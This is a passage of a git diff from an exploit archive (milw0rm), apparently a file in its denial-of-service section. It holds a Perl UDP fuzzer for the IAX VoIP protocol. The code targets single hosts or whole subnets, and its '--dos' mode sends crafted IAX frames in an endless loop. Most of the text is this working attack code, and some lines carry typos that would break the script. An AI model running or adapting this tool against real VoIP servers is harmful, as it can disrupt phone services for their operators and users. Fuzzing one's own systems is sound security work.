+// milw0rm.com [2009-06-04] diff --git a/platforms/multiple/dos/8940.pl b/platforms/multiple/dos/8940.pl index cdddf5476..0efc6663e 100755 --- a/platforms/multiple/dos/8940.pl +++ b/platforms/multiple/dos/8940.pl @@ -1,510 +1,510 @@ -#!/usr/bin/perl -w -#udp IAX protocol fuzzer -#Created: Blake Cornell -# Exploits found with this code can be -# found at -# http://www.securityscraper.com/ -#Released under the VoIPER project -# -# Do not hesitate to show enthusiasm and support -# and help develop this further. - -use strict; -use IO::Socket; -use Getopt::Long; -use Net::Subnets; -use Pod::Usage; - -my @target_port = (4569); -my @targets = ('127.0.0.1'); -my $result = GetOptions('port|p=i' => \(my $port = ''), - 'host|h=s' => \(my $host = ''), - 'dos' => \(my $dos = ''), - 'bruteforce' => \(my $bruteforce = ''), - 'timeout|t=i' => \(my $timeout = ''), - 'dust=i' => \(my $dust = ''), - 'listen' => \(my $listen = ''), - 'verbose|v' => \(my $verbose = ''), - 'help|?' => \(my $help = '')) or pod2usage(2); - -if($help) { printUsage(); } -if($host) { @targets=@{retHosts($host)}; } -if($port) { $target_port[0] = $port; } -if($listen&&$dos) { print("DoS mode is in Listening Mode\n"); } - -for(my $i=0; $i<=$#targets;$i++) { - if($verbose) { print($targets[$i]."\n"); } - fuzzIAX($targets[$i],4569,$timeout); -} -exit; - -sub fuzzIAX { - my($target,$port,$timeout,@args)=@_; - - if($verbose) { print("Trying $target:$port\n"); } - - socket(PING, PF_INET, SOCK_DGRAM, getprotobyname("udp")); - - my %iaxFrameTypes=( - 'Nan' => "00", - 'DTMF' => "01", - 'VOICE' => "02", - 'VIDEO' => "03", - 'CONTROL' => "04", - 'Null' => "05", - 'IAXCONTROL' => "06", - 'TEXT' => "07", - 'IMAGE' => "08", - 'HTML' => "09", - 'COMFORTNOISE' => "0a", - 'Unknown' => "0b", - 'Unknown' => "0c", - 'Unknown' => "0d", - 'Unknown' => "0e", - 'Unknown' => "0f"); - - my %iaxControls=( - 'Nan' => "00", - 'HANGUP' => "01", - 'Reserved' => "02", - 'RINGING' => "03", - 'ANSWER' => "04", - 'BUSY' => "05", - 'Reserved' => "06", - 'Reserved' => "07", - 'CONGESTION' => "08", - 'FLASH_HOOK' => "09", - 'Reserved' => "0a", - 'OPTION' => "0b", - 'KEY_RADIO' => "0c", - 'UNKEY_RADIO' => "0d", - 'CALL_PROGRESS' => "0e", - 'CALL_PROCEEDING' => "0f", - 'HOLD' => "10", - 'UNHOLD' => "11"); - - my %iaxControlFrames=( - 'Nan' => "00", - 'NEW' => "01", - 'PING' => "02", - 'PONG' => "03", - 'ACK' => "04", - 'HANGUP' => "05", - 'REJECT' => "06", - 'ACCEPT' => "07", - 'AUTHREQ' => "08", - 'AUTHREP' => "09", - 'INVAL' => "0a", - 'LAGRQ' => "0b", - 'LAGRP' => "0c", - 'REGREQ' => "0d", - 'REGAUTH' => "0e", - 'REGACK' => "0f", - 'REGREJ' => "10", - 'REGREL' => "11", - 'VNACK' => "12", - 'DPREQ' => "13", - 'DPREP' => "14", - 'DIAL' => "15", - 'TXREQ' => "16", - 'TXCNT' => "17", - 'TXACC' => "18", - 'TXREADY' => "19", - 'TXREL' => "1a", - 'TXREJ' => "1b", - 'QUELCH' => "1c", - 'UNQUELCH' => "1d", - 'POKE' => "1e", - 'Reserved' => "1f", - 'MWI' => "20", - 'UNSUPPORT' => "21", - 'TRANSFER' => "22", - 'Reserved' => "23", - 'Reserved' => "24", - 'Reserved' => "25"); - - my %iaxHTML = ( - 'SEND_URL' => 1, - 'DATA_FRAME' => 2, - 'BEGINNING_FRAME' => 4, - 'END_FRAME' => 8, - 'LOAD_COMPLETE' => 16, - 'PEER_NO_HTML' => 17, - 'LINK_URL' => 18, - 'UNLINK_URL' => 19, - 'REJECT_LINK_URL' => 20); - - my %iaxIE = ( - 'CALLED_NUMBER' => "01", - 'CALLING_NUMBER' => "02", - 'CALLING_ANI' => "03", - 'CALLING_NAME' => "04", - 'CALLED_CONTEXT' => "05", - 'USERNAME' => "06", - 'PASSWORD' => "07", - 'CAPABILITY' => "08", - 'FORMAT' => "09", - 'LANGUAGE' => "0a", - 'VERSION' => "0b", - 'ADSPICE' => "0c", - 'DNID' => "0d", - 'AUTHMETHODS' => "0e", - 'CHALLENGE' => "0f", - 'MD5_RESULT' => "10", - 'RSA_RESULT' => "11", - 'APPARENT_ADDR' => "12", - 'REFRESH' => "13", - 'DPSTATUS' => "14", - 'CALLNO' => "15", - 'CAUSE' => "16", - 'IAX_UNKNOWN' => "17", - 'MSGCOUNT' => "18", - 'AUTOANSWER' => "19", - 'MUSICONHOLD' => "1a", - 'TRANSFERID' => "1b", - 'RDNIS' => "1c", - 'Reserved' => "1d", - 'Reserved' => "1e", - 'DATETIME' => "1f", - 'Reserved' => "20", - 'Reserved' => "21", - 'Reserved' => "22", - 'Reserved' => "23", - 'Reserved' => "24", - 'Reserved' => "25", - 'CALLINGPRES' => "26", - 'CALLINGTON' => "27", - 'CALLINGTNS' => "28", - 'SAMPLINGRATE' => "29", - 'CAUSECODE' => "2a", - 'ENCRYPTION' => "2b", - 'ENCKEY' => "2c", - 'CODEC_PREFS' => "2d", - 'RR_JITTER' => "2e", - 'RR_LOSS' => "2f", - 'RR_PKTS' => "30", - 'RR_DELAY' => "31", - 'RR_DROPPED' => "32", - 'RR_000' => "33"); - - my %iaxDTMF = ( - '0' => 0, - '1' => 1, - '2' => 2, - '3' => 3, - '4' => 4, - '5' => 5, - '6' => 6, - '7' => 7, - '8' => 8, - '9' => 9, - '*' => 10, - '#' => 11, - 'A' => 12, - 'B' => 13, - 'C' => 14, - 'D' => 15); - - my $MAXLEN = 1024; - my $TIMEOUT = 1; - if(defined($timeout) && $timeout ne '' && $timeout != 0) { #timeout of 0 hangs - #unanswered requests - $TIMEOUT=$timeout; - } - - if($dos) { - if($verbose) { print("Dos attempts initiated\n"); } - - my $src_call = "8000"; - my $dst_call = "0000"; - my $timestamp = "00000000"; - - #use rand sequence information to line up RE issues. - my $outbound_seq = unpack("H2",pack("H2",int(rand(256)))); - my $inbound_seq = unpack("H2",pack("H2",int(rand(256)))); - #or not - #my $outbound_seq = "00"; - #my $inbound_seq = "00"; - - for(my $i=1; 1==1; $i++) { - foreach my $frame (keys(%iaxFrameTypes)) { - foreach my $subset (keys(%iaxControlFrames)) { - foreach my $ie (keys(%iaxIE)) { - my $out_msg = $src_call . - $dst_call . - $timestamp . - $outbound_seq . - $inbound_seq . - $iaxFrameTypes{$frame} . - $iaxControlFrames{$subset} . - $iaxIE{$ie}; - if(my @args = sendUDPSocket($out_msg,$target,$port,$TIMEOUT,$listen,0)) { - if($verbose && $i%1==0) { - print('['.scalar(localtime).'] '); - print($frame.' '.$subset.' '.$ie."\n"); - } - } - } - } - } - print "Looping\n"; - } - }elsif($bruteforce) { - while(1) { - bruteForceFUZZ($target,$port,$listen,$timeout,\%iaxFrameTypes,\%iaxControlFrames,\%iaxIE); - print("\t\tLooping\n\n"); - sleep(5); - } - }else{ ###smart fuzz - - my $src_call = "8000"; - my $dst_call = "0000"; - my $timestamp = "00000000"; - my $outbound_seq = "00"; - my $inbound_seq = "00"; - -foreach my $frameType (keys(%iaxFrameTypes)) { - if($frameType eq 'CONTROL') { - foreach my $controlKey (keys(%iaxControls)) { - foreach my $ieKey (keys(%iaxIE)) { - my $out_msg = $src_call . $dst_call . $timestamp . $outbound_seq . $inbound_seq . $iaxFrameTypes{$frameType} . $iaxControls{$controlKey} . $iaxIE{$ieKey}."00"; - if(my @recv = sendUDPSocket($out_msg,$target,$port,$TIMEOUT,1)) { - if(defined($recv[0]) && defined($recv[1])) { - print('['.scalar(localtime).'] '); - print($recv[0].' '.$recv[1].' '.$frameType.' '.$controlKey." ".$ieKey."\n"); - } - if(defined($recv[2]) && defined($out_msg) && length($recv[2]) > length($out_msg)) { - print(length($recv[2])-length($out_msg)." bytes difference\n"); - print($out_msg.' '.$recv[2]."\n"); - } - } - } - } - - }elsif($frameType eq 'IAXCONTROL') { - foreach my $frameKey (keys(%iaxControlFrames)) { - foreach my $ieKey (keys(%iaxIE)) { - my $out_msg = $src_call . $dst_call . $timestamp . $outbound_seq . $inbound_seq . $iaxFrameTypes{$frameType} . $iaxControlFrames{$frameKey} . $iaxIE{$ieKey}.'00'; - if(my @recv = sendUDPSocket($out_msg,$target,$port,$TIMEOUT,1)) { - if(defined($recv[0]) && defined($recv[1])) { - logAngPrint('['.scalar(localtime).'] '); - print($recv[0].' '.$recv[1].' '.$frameType.' '.$frameKey." ".$ieKey.' '); - } - if(defined($recv[2]) && defined($out_msg) && length($recv[2]) > length($out_msg)) { - print(length($recv[2])-length($out_msg)." bytes difference\n"); - print($out_msg.' '.$recv[2]."\n"); - } - } - } - } - }elsif($frameType eq 'HTML') { - foreach my $htmlKey (keys(%iaxHTML)) { - foreach my $ieKey (keys(%iaxIE)) { - my $out_msg = $src_call . $dst_call . $timestamp . $outbound_seq . $inbound_seq . $iaxFrameTypes{$frameType} . $iaxHTML{$htmlKey} . $iaxIE{$ieKey}.'00'; - if(my @recv = sendUDPSocket($out_msg,$target,$port,$TIMEOUT,1)) { - if(defined($recv[0]) && defined($recv[1])) { - print('['.scalar(localtime).'] '); - print($recv[0].' '.$recv[1].' '.$frameType.' '.$htmlKey." ".$ieKey.' '); - } - if(defined($recv[2]) && defined($out_msg) && length($recv[2]) > length($out_msg)) { - print(length($recv[2])-length($out_msg)." bytes difference\n"); - print($out_msg.' '.$recv[2]."\n"); - } - } - } - } - - }elsif($frameType eq 'DTMF') { - foreach my $dtmfKey (keys(%iaxDTMF)) { - foreach my $ieKey (keys(%iaxIE)) { - my $out_msg = $src_call . $dst_call . $timestamp . $outbound_seq . $inbound_seq . $iaxFrameTypes{$frameType} . $iaxDTMF{$dtmfKey} . $iaxIE{$ieKey}.'00'; - if(my @recv = sendUDPSocket($out_msg,$target,$port,$TIMEOUT,1)) { - if(defined($recv[0]) && defied($recv[2])) { - print('['.scalar(localtime).'] '); - print($recv[0].' '.$recv[1].' '.$frameType.' '.$dtmfKey." ".$ieKey.' '); - } - if(defined($recv[2]) && defined($out_msg) && length($recv[2]) > length($out_msg)) { - print(length($recv[2])-length($out_msg)." bytes difference\n"); - print($out_msg.' '.$recv[2]."\n"); - } - } - } - } - }elsif($frameType eq 'TEXT') { - my $out_msg = $src_call . $dst_call . $timestamp . $outbound_seq . $inbound_seq . $iaxFrameTypes{$frameType} . "00"; #text frame types "must" have a subclass of 0? - if(my @recv = sendUDPSocket($out_msg,$target,$port,$TIMEOUT,1)) { - if(defined($recv[0]) && defined($recv[1])) { - print('['.scalar(localtime).'] '); - print($recv[0].' '.$recv[1].' '.$frameType.' 00 '); - } - if(defined($recv[2]) && defined($out_msg) && length($recv[2]) > length($out_msg)) { - print(length($recv[2])-length($out_msg)." bytes difference\n"); - print($out_msg.' '.$recv[2]."\n"); - } - } - }else{ - foreach my $frameKey (keys(%iaxControlFrames)) { - foreach my $ieKey (keys(%iaxIE)) { - my $out_msg = $src_call . $dst_call . $timestamp . $outbound_seq . $inbound_seq . $iaxFrameTypes{$frameType} . $iaxControlFrames{$frameKey} . $iaxIE{$ieKey}.'00'; - if(my @recv = sendUDPSocket($out_msg,$target,$port,$TIMEOUT,1)) { - if(defined($recv[0]) && defined($recv[1])) { - print('['.scalar(localtime).'] '); - print($recv[0].' '.$recv[1].' '.$frameType.' '.$frameKey." ".$ieKey.' '); - } - if(defined($recv[2]) && defined($out_msg) && length($recv[2]) > length($out_msg)) { - print(length($recv[2])-length($out_msg)." bytes difference\n"); - print($out_msg.' '.$recv[2]."\n"); - } - } - } - } - } - } - } -} - -sub sendUDPSocket { - my($msg,$target,$port,$timeout,$listen,@args)=@_; - - my $MAXLEN=1024; - - #my($respaddr,$port); - my $out_msg = pack("H*",$msg); - my $ipaddr = inet_aton($target); - my $sin = sockaddr_in($port,$ipaddr); - send(PING, $out_msg, 0, $sin) == length($out_msg) or die "cannot send to $target : $port : $!\n"; - - if($listen) { - #sleep(.005); - eval { - local $SIG{ALRM} = sub { die "alarm time out"; }; - alarm $timeout; - #alarm $timeout; - while (1) { - my $recvfrom = recv(PING, my $in_msg, $MAXLEN, 0) or die "recv: $!"; - ($port, $ipaddr) = sockaddr_in($recvfrom); - my $respaddr = inet_ntoa($ipaddr); - if($verbose) { - displayIAXRaw($respaddr,$port,$respaddr,$out_msg,$in_msg); - } - return($respaddr,$port,unpack("H*",$in_msg)); - } - }; - return 0; - } -} - -sub bruteForceFUZZ { - my($target,$port,$listen,$timeout,$refFrameTypes,$refControlFrames,$refIE,@args)=@_; - - my %iaxFrameTypes=%{$refFrameTypes}; - my %iaxControlFrames=%{$refControlFrames}; - my %iaxIE=%{$refIE}; - - for(my $a=32768;$a<=32768;$a++) {# Full Packet 4byte - for(my $b=0;$b<=0;$b++) {# Dest Call 4byte - for(my $c=0;$c<=0;$c++) {# Timestamp 8byte - #for(my $d=0;$d<=0;$d++) {# Out Seq # 2byte - my $loopD=1; - #for(my $d=unpack("H2",pack("H2",int(rand(256))));$loopD;$d++) {# Out Seq # 2byte - # $loopD=0; - - my $outbound_seq = unpack("H2",pack("H2",int(rand(256)))); - my $inbound_seq = unpack("H2",pack("H2",int(rand(256)))); - - - #if($verbose) {print(sprintf("%04x",$a)." ".sprintf("%04x",$b)." ".sprintf("%08x",$c)." ".sprintf("%02x",$d)."\n"); } - for(my $d=0;1;$d++) { - for(my $e=0;1;$e++) {# In Seq # 2byte - foreach my $frameType (keys(%iaxFrameTypes)) { - foreach my $frameKey (keys(%iaxControlFrames)) { - foreach my $ie (keys(%iaxIE)) { - for(my $f=0;$f<=0;$f++) { - my $maxDust=10; - if($listen) { $maxDust/=2; } - if(defined($dust) && length($dust) > 0) { $maxDust=$dust; } - for(my $z=1;$z<=$maxDust;$z++) { - my $len = int(rand(9)); - my $box= int(rand("9"x(($len+1)))); - for(my $zz=1;$zz<=$maxDust;$zz++) { - my $hex_msg = sprintf("%04x",$a).sprintf("%04x",$b).sprintf("%08x",$c).sprintf("%02x",$d).sprintf("%02x",$e). $iaxFrameTypes{$frameType} . $iaxControlFrames{$frameKey} . $iaxIE{$ie} . sprintf("%02x",$f) . sprintf("%0".$len."x",$box); - if($verbose) {print("[" . scalar(localtime) . "] '" . $frameType."_".$frameKey."_".$ie."_".sprintf("%02x",$f)."_".sprintf("%0".$len."x",$box)."'\n"); } - foreach my $var (sendUDPSocket($hex_msg,$target,$port,1,$listen)) { if($verbose) { print($var."_"); } } - } - }}}}}}}}}} #<------ VERY IMPORTANT -} - -sub retIAXHostActive { - my($target,$port,@args)=@_; - my $out_msg=''; - if(my @recv = sendUDPSocket($out_msg,$target,$port,1,1)) { - return 1; - } - return 0; -} - -sub retHosts { - my($host,@args)=@_; - my @addrs; - - if(!$host) { return ('127.0.0.1') }; - - if($host =~ /^([\d]{1,3}).([\d]{1,3}).([\d]{1,3}).([\d]{1,3})\/([\d]{1,2})$/ && $1 >= 0 && $1 <= 255 && $2 >= 0 && $2 <= 255 && $3 >= 0 && $3 <= 255 && $4 >= 0 && $4 <= 255) { - #Check to see if host is valid class C CIDR Address - if($verbose) { print("Setting CIDR Address Range\n"); } - my $sn = Net::Subnets->new; - - my($low,$high)=$sn->range(\$host); - if($verbose) { print("Determined IP Ranges From $$low - $$high\n"); } - return \@{ $sn->list(\($$low,$$high)) }; - }elsif($host =~ /^([\d]{1,3}).([\d]{1,3}).([\d]{1,3}).([\d]{1,3})$/ && $1 >= 0 && $1 <= 255 && $2 >= 0 && $2 <= 255 && $3 >= 0 && $3 <= 255 && $4 >= 0 && $4 <= 255) { - #Check to see if host is valid IP - push(@addrs,"$1.$2.$3.$4"); - }else{ - push(@addrs,$host); - } - return \@addrs; -} - -sub displayIAXRaw { - my($respaddr,$port,$out_msg,$in_msg)=@_; - - if(defined($in_msg) && unpack("H*",$in_msg) ne '80000000000000000000060a') { - print("[" . scalar(localtime) . "] $respaddr:$port\t$respaddr\t" . unpack("H*",$out_msg) . "\t". unpack("H*",$in_msg) . "\n"); - }elsif(defined($respaddr) && defined($port)) { - print(scalar(localtime) . " $respaddr:$port\t$respaddr\n"); - - } -} - -sub displayIAXPacket { - my($hex_msg,@args)=@_; - - my $width=32/8; - - for(my $i=0;$i*$width<=length($hex_msg);$i++) { - print(substr($hex_msg,$i*$width,$width)."\n"); - } - #print $hex_msg."\n"; -} - -sub printUsage { - print "$0 --dos\n\t\tWill loop through known or manually preset packet combinations.\n"; - print "$0 --bruteforce\n\t\tBrute force fuzzes on default port of 4569. It will try random data packaging at the end of a valid packet. It will by default send 10 per each packet.\n"; - print "$0 -h 127.0.0.1 --bruteforce --dust 1\n\t\tBrute force fuzzes on default port of 4569. It will try random data packaging at the end of a valid packet. It will only send 1 of each packet.\n"; - print "$0 \n\t\tScans the loopback interface by rough usage from IETF guidelines.\n"; - exit; -} - -sub logAndPrint { - my($string,@args)=@); - - if(1==1 || defined($string)) { - print $string; - open(FLE,">>$0_logs_[".scalar(localtime)."] $string"); - print FLE $string; - close(FLE); - } -} - -# milw0rm.com [2009-06-12] +#!/usr/bin/perl -w +#udp IAX protocol fuzzer +#Created: Blake Cornell +# Exploits found with this code can be +# found at +# http://www.securityscraper.com/ +#Released under the VoIPER project +# +# Do not hesitate to show enthusiasm and support +# and help develop this further. + +use strict; +use IO::Socket; +use Getopt::Long; +use Net::Subnets; +use Pod::Usage; + +my @target_port = (4569); +my @targets = ('127.0.0.1'); +my $result = GetOptions('port|p=i' => \(my $port = ''), + 'host|h=s' => \(my $host = ''), + 'dos' => \(my $dos = ''), + 'bruteforce' => \(my $bruteforce = ''), + 'timeout|t=i' => \(my $timeout = ''), + 'dust=i' => \(my $dust = ''), + 'listen' => \(my $listen = ''), + 'verbose|v' => \(my $verbose = ''), + 'help|?' => \(my $help = '')) or pod2usage(2); + +if($help) { printUsage(); } +if($host) { @targets=@{retHosts($host)}; } +if($port) { $target_port[0] = $port; } +if($listen&&$dos) { print("DoS mode is in Listening Mode\n"); } + +for(my $i=0; $i<=$#targets;$i++) { + if($verbose) { print($targets[$i]."\n"); } + fuzzIAX($targets[$i],4569,$timeout); +} +exit; + +sub fuzzIAX { + my($target,$port,$timeout,@args)=@_; + + if($verbose) { print("Trying $target:$port\n"); } + + socket(PING, PF_INET, SOCK_DGRAM, getprotobyname("udp")); + + my %iaxFrameTypes=( + 'Nan' => "00", + 'DTMF' => "01", + 'VOICE' => "02", + 'VIDEO' => "03", + 'CONTROL' => "04", + 'Null' => "05", + 'IAXCONTROL' => "06", + 'TEXT' => "07", + 'IMAGE' => "08", + 'HTML' => "09", + 'COMFORTNOISE' => "0a", + 'Unknown' => "0b", + 'Unknown' => "0c", + 'Unknown' => "0d", + 'Unknown' => "0e", + 'Unknown' => "0f"); + + my %iaxControls=( + 'Nan' => "00", + 'HANGUP' => "01", + 'Reserved' => "02", + 'RINGING' => "03", + 'ANSWER' => "04", + 'BUSY' => "05", + 'Reserved' => "06", + 'Reserved' => "07", + 'CONGESTION' => "08", + 'FLASH_HOOK' => "09", + 'Reserved' => "0a", + 'OPTION' => "0b", + 'KEY_RADIO' => "0c", + 'UNKEY_RADIO' => "0d", + 'CALL_PROGRESS' => "0e", + 'CALL_PROCEEDING' => "0f", + 'HOLD' => "10", + 'UNHOLD' => "11"); + + my %iaxControlFrames=( + 'Nan' => "00", + 'NEW' => "01", + 'PING' => "02", + 'PONG' => "03", + 'ACK' => "04", + 'HANGUP' => "05", + 'REJECT' => "06", + 'ACCEPT' => "07", + 'AUTHREQ' => "08", + 'AUTHREP' => "09", + 'INVAL' => "0a", + 'LAGRQ' => "0b", + 'LAGRP' => "0c", + 'REGREQ' => "0d", + 'REGAUTH' => "0e", + 'REGACK' => "0f", + 'REGREJ' => "10", + 'REGREL' => "11", + 'VNACK' => "12", + 'DPREQ' => "13", + 'DPREP' => "14", + 'DIAL' => "15", + 'TXREQ' => "16", + 'TXCNT' => "17", + 'TXACC' => "18", + 'TXREADY' => "19", + 'TXREL' => "1a", + 'TXREJ' => "1b", + 'QUELCH' => "1c", + 'UNQUELCH' => "1d", + 'POKE' => "1e", + 'Reserved' => "1f", + 'MWI' => "20", + 'UNSUPPORT' => "21", + 'TRANSFER' => "22", + 'Reserved' => "23", + 'Reserved' => "24", + 'Reserved' => "25"); + + my %iaxHTML = ( + 'SEND_URL' => 1, + 'DATA_FRAME' => 2, + 'BEGINNING_FRAME' => 4, + 'END_FRAME' => 8, + 'LOAD_COMPLETE' => 16, + 'PEER_NO_HTML' => 17, + 'LINK_URL' => 18, + 'UNLINK_URL' => 19, + 'REJECT_LINK_URL' => 20); + + my %iaxIE = ( + 'CALLED_NUMBER' => "01", + 'CALLING_NUMBER' => "02", + 'CALLING_ANI' => "03", + 'CALLING_NAME' => "04", + 'CALLED_CONTEXT' => "05", + 'USERNAME' => "06", + 'PASSWORD' => "07", + 'CAPABILITY' => "08", + 'FORMAT' => "09", + 'LANGUAGE' => "0a", + 'VERSION' => "0b", + 'ADSPICE' => "0c", + 'DNID' => "0d", + 'AUTHMETHODS' => "0e", + 'CHALLENGE' => "0f", + 'MD5_RESULT' => "10", + 'RSA_RESULT' => "11", + 'APPARENT_ADDR' => "12", + 'REFRESH' => "13", + 'DPSTATUS' => "14", + 'CALLNO' => "15", + 'CAUSE' => "16", + 'IAX_UNKNOWN' => "17", + 'MSGCOUNT' => "18", + 'AUTOANSWER' => "19", + 'MUSICONHOLD' => "1a", + 'TRANSFERID' => "1b", + 'RDNIS' => "1c", + 'Reserved' => "1d", + 'Reserved' => "1e", + 'DATETIME' => "1f", + 'Reserved' => "20", + 'Reserved' => "21", + 'Reserved' => "22", + 'Reserved' => "23", + 'Reserved' => "24", + 'Reserved' => "25", + 'CALLINGPRES' => "26", + 'CALLINGTON' => "27", + 'CALLINGTNS' => "28", + 'SAMPLINGRATE' => "29", + 'CAUSECODE' => "2a", + 'ENCRYPTION' => "2b", + 'ENCKEY' => "2c", + 'CODEC_PREFS' => "2d", + 'RR_JITTER' => "2e", + 'RR_LOSS' => "2f", + 'RR_PKTS' => "30", + 'RR_DELAY' => "31", + 'RR_DROPPED' => "32", + 'RR_000' => "33"); + + my %iaxDTMF = ( + '0' => 0, + '1' => 1, + '2' => 2, + '3' => 3, + '4' => 4, + '5' => 5, + '6' => 6, + '7' => 7, + '8' => 8, + '9' => 9, + '*' => 10, + '#' => 11, + 'A' => 12, + 'B' => 13, + 'C' => 14, + 'D' => 15); + + my $MAXLEN = 1024; + my $TIMEOUT = 1; + if(defined($timeout) && $timeout ne '' && $timeout != 0) { #timeout of 0 hangs + #unanswered requests + $TIMEOUT=$timeout; + } + + if($dos) { + if($verbose) { print("Dos attempts initiated\n"); } + + my $src_call = "8000"; + my $dst_call = "0000"; + my $timestamp = "00000000"; + + #use rand sequence information to line up RE issues. + my $outbound_seq = unpack("H2",pack("H2",int(rand(256)))); + my $inbound_seq = unpack("H2",pack("H2",int(rand(256)))); + #or not + #my $outbound_seq = "00"; + #my $inbound_seq = "00"; + + for(my $i=1; 1==1; $i++) { + foreach my $frame (keys(%iaxFrameTypes)) { + foreach my $subset (keys(%iaxControlFrames)) { + foreach my $ie (keys(%iaxIE)) { + my $out_msg = $src_call . + $dst_call . + $timestamp . + $outbound_seq . + $inbound_seq . + $iaxFrameTypes{$frame} . + $iaxControlFrames{$subset} . + $iaxIE{$ie}; + if(my @args = sendUDPSocket($out_msg,$target,$port,$TIMEOUT,$listen,0)) { + if($verbose && $i%1==0) { + print('['.scalar(localtime).'] '); + print($frame.' '.$subset.' '.$ie."\n"); + } + } + } + } + } + print "Looping\n"; + } + }elsif($bruteforce) { + while(1) { + bruteForceFUZZ($target,$port,$listen,$timeout,\%iaxFrameTypes,\%iaxControlFrames,\%iaxIE); + print("\t\tLooping\n\n"); + sleep(5); + } + }else{ ###smart fuzz + + my $src_call = "8000"; + my $dst_call = "0000"; + my $timestamp = "00000000"; + my $outbound_seq = "00"; + my $inbound_seq = "00"; + +foreach my $frameType (keys(%iaxFrameTypes)) { + if($frameType eq 'CONTROL') { + foreach my $controlKey (keys(%iaxControls)) { + foreach my $ieKey (keys(%iaxIE)) { + my $out_msg = $src_call . $dst_call . $timestamp . $outbound_seq . $inbound_seq . $iaxFrameTypes{$frameType} . $iaxControls{$controlKey} . $iaxIE{$ieKey}."00"; + if(my @recv = sendUDPSocket($out_msg,$target,$port,$TIMEOUT,1)) { + if(defined($recv[0]) && defined($recv[1])) { + print('['.scalar(localtime).'] '); + print($recv[0].' '.$recv[1].' '.$frameType.' '.$controlKey." ".$ieKey."\n"); + } + if(defined($recv[2]) && defined($out_msg) && length($recv[2]) > length($out_msg)) { + print(length($recv[2])-length($out_msg)." bytes difference\n"); + print($out_msg.' '.$recv[2]."\n"); + } + } + } + } + + }elsif($frameType eq 'IAXCONTROL') { + foreach my $frameKey (keys(%iaxControlFrames)) { + foreach my $ieKey (keys(%iaxIE)) { + my $out_msg = $src_call . $dst_call . $timestamp . $outbound_seq . $inbound_seq . $iaxFrameTypes{$frameType} . $iaxControlFrames{$frameKey} . $iaxIE{$ieKey}.'00'; + if(my @recv = sendUDPSocket($out_msg,$target,$port,$TIMEOUT,1)) { + if(defined($recv[0]) && defined($recv[1])) { + logAngPrint('['.scalar(localtime).'] '); + print($recv[0].' '.$recv[1].' '.$frameType.' '.$frameKey." ".$ieKey.' '); + } + if(defined($recv[2]) && defined($out_msg) && length($recv[2]) > length($out_msg)) { + print(length($recv[2])-length($out_msg)." bytes difference\n"); + print($out_msg.' '.$recv[2]."\n"); + } + } + } + } + }elsif($frameType eq 'HTML') { + foreach my $htmlKey (keys(%iaxHTML)) { + foreach my $ieKey (keys(%iaxIE)) { + my $out_msg = $src_call . $dst_call . $timestamp . $outbound_seq . $inbound_seq . $iaxFrameTypes{$frameType} . $iaxHTML{$htmlKey} . $iaxIE{$ieKey}.'00'; + if(my @recv = sendUDPSocket($out_msg,$target,$port,$TIMEOUT,1)) { + if(defined($recv[0]) && defined($recv[1])) { + print('['.scalar(localtime).'] '); + print($recv[0].' '.$recv[1].' '.$frameType.' '.$htmlKey." ".$ieKey.' '); + } + if(defined($recv[2]) && defined($out_msg) && length($recv[2]) > length($out_msg)) { + print(length($recv[2])-length($out_msg)." bytes difference\n"); + print($out_msg.' '.$recv[2]."\n"); + } + } + } + } + + }elsif($frameType eq 'DTMF') { + foreach my $dtmfKey (keys(%iaxDTMF)) { + foreach my $ieKey (keys(%iaxIE)) { + my $out_msg = $src_call . $dst_call . $timestamp . $outbound_seq . $inbound_seq . $iaxFrameTypes{$frameType} . $iaxDTMF{$dtmfKey} . $iaxIE{$ieKey}.'00'; + if(my @recv = sendUDPSocket($out_msg,$target,$port,$TIMEOUT,1)) { + if(defined($recv[0]) && defied($recv[2])) { + print('['.scalar(localtime).'] '); + print($recv[0].' '.$recv[1].' '.$frameType.' '.$dtmfKey." ".$ieKey.' '); + } + if(defined($recv[2]) && defined($out_msg) && length($recv[2]) > length($out_msg)) { + print(length($recv[2])-length($out_msg)." bytes difference\n"); + print($out_msg.' '.$recv[2]."\n"); + } + } + } + } + }elsif($frameType eq 'TEXT') { + my $out_msg = $src_call . $dst_call . $timestamp . $outbound_seq . $inbound_seq . $iaxFrameTypes{$frameType} . "00"; #text frame types "must" have a subclass of 0? + if(my @recv = sendUDPSocket($out_msg,$target,$port,$TIMEOUT,1)) { + if(defined($recv[0]) && defined($recv[1])) { + print('['.scalar(localtime).'] '); + print($recv[0].' '.$recv[1].' '.$frameType.' 00 '); + } + if(defined($recv[2]) && defined($out_msg) && length($recv[2]) > length($out_msg)) { + print(length($recv[2])-length($out_msg)." bytes difference\n"); + print($out_msg.' '.$recv[2]."\n"); + } + } + }else{ + foreach my $frameKey (keys(%iaxControlFrames)) { + foreach my $ieKey (keys(%iaxIE)) { + my $out_msg = $src_call . $dst_call . $timestamp . $outbound_seq . $inbound_seq . $iaxFrameTypes{$frameType} . $iaxControlFrames{$frameKey} . $iaxIE{$ieKey}.'00'; + if(my @recv = sendUDPSocket($out_msg,$target,$port,$TIMEOUT,1)) { + if(defined($recv[0]) && defined($recv[1])) { + print('['.scalar(localtime).'] '); + print($recv[0].' '.$recv[1].' '.$frameType.' '.$frameKey." ".$ieKey.' '); + } + if(defined($recv[2]) && defined($out_msg) && length($recv[2]) > length($out_msg)) { + print(length($recv[2])-length($out_msg)." bytes difference\n"); + print($out_msg.' '.$recv[2]."\n"); + } + } + } + } + } + } + } +} + +sub sendUDPSocket { + my($msg,$target,$port,$timeout,$listen,@args)=@_; + + my $MAXLEN=1024; + + #my($respaddr,$port); + my $out_msg = pack("H*",$msg); + my $ipaddr = inet_aton($target); + my $sin = sockaddr_in($port,$ipaddr); + send(PING, $out_msg, 0, $sin) == length($out_msg) or die "cannot send to $target : $port : $!\n"; + + if($listen) { + #sleep(.005); + eval { + local $SIG{ALRM} = sub { die "alarm time out"; }; + alarm $timeout; + #alarm $timeout; + while (1) { + my $recvfrom = recv(PING, my $in_msg, $MAXLEN, 0) or die "recv: $!"; + ($port, $ipaddr) = sockaddr_in($recvfrom); + my $respaddr = inet_ntoa($ipaddr); + if($verbose) { + displayIAXRaw($respaddr,$port,$respaddr,$out_msg,$in_msg); + } + return($respaddr,$port,unpack("H*",$in_msg)); + } + }; + return 0; + } +} + +sub bruteForceFUZZ { + my($target,$port,$listen,$timeout,$refFrameTypes,$refControlFrames,$refIE,@args)=@_; + + my %iaxFrameTypes=%{$refFrameTypes}; + my %iaxControlFrames=%{$refControlFrames}; + my %iaxIE=%{$refIE}; + + for(my $a=32768;$a<=32768;$a++) {# Full Packet 4byte + for(my $b=0;$b<=0;$b++) {# Dest Call 4byte + 